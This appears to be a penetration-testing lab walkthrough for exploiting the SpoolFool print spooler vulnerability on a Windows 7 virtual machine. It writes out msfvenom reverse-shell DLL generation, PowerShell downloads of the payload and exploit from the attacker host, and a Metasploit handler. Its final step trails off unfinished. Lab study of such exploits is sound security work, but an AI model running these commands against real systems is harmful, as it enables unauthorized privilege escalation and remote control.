Objective: To demonstrate how to exploit a Windows machine via SpoolFool vulnerability
and gain a reverse shell with escalated privileges.
Prerequisites:
● A Windows 7 machine in a virtual environment (VirtualBox)
● A Kali Linux machine in a virtual environment (VirtualBox)
● A working internet connection
● SpoolFool PoC (https://github.com/ly4k/SpoolFool) downloaded on the Kali Linux
machine
- First, we will need to download the PoC created by Oliver Lyak from the GitHub link
provided in the previous response. - Open a terminal in Kali Linux and navigate to the directory where you have
downloaded the SpoolFool files. - Use the command ls to check the files available in the directory. You should see an
EXE file and a pre-made DLL payload. - Next, we will need to compromise the Windows 7 machine and gain a reverse shell.
For this, you can use any method of your choice such as Metasploit or manual
exploitation. Once you have a reverse shell, you can check the current user’s
permissions by running the command whoami /user /groups - Now, we will create a custom DLL using msfvenom. For this exercise, we will use the
meterpreter injection as the payload. Run the command msfvenom -p
windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IP_of_kali_machine
LPORT=9501 > reverse_64bit.dll (replace IP_of_kali_machine with the IP address of
your Kali Linux machine) - Once the DLL is generated, we need to upload it to the Windows 7 machine. We
recommend using the C:\Users\Public directory for this. You can start a python
server and host the SpoolFool.exe and reverse_64bit.dll files in the same location.
This can be done using the powershell module IWR by running the command
powershell -c iwr http://IP_of_kali_machine/reverse_64bit.dll -outf
\Users\Public\reverse.dll and powershell -c iwr
http://IP_of_kali_machine/SpoolFool.exe -outf \Users\Public\SpoolFool.exe (replace
IP_of_kali_machine with the IP address of your Kali Linux machine) - Now, we can run the exploit by using the command SpoolFool.exe -dll reverse.dll in
the command prompt on the Windows 7 machine. Before running this command,
make sure to set up multi/handler in msfconsole by running the command use
multi/handler, set payload windows/x64/meterpreter/reverse_tcp, set LHOST
IP_of_kali_machine and set LPORT 9501. - Once the exploit is executed, you will notice that a new directory has been created in
%temp%\d5f5….{random name} and a reparse point has been created to write into
the print driver directory C:\Windows\system32\spool\DRIVERS\x64\4. - The directory should now exist and the DLL should be saved in it, indicating a
successful exploit. You should also see that the directory is writable by everyone. - Finally, start the multi/handler in msfconsole by running the command run
- Now you should have a meterpreter session on the Windows 7 machine. To check
the current user’s permissions and to confirm that the privileges have been
escalated.
Note: This exercise is only for educational purposes and should be carried out in a controlled
and secured lab environment.
Reference:
● VirtualBox: https://www.virtualbox.org/wiki/Downloads
● Kali Linux: https://www.kali.org/downloads/
● https://www.hackingarticles.in/windows-privilege-escalation-spoolfool/
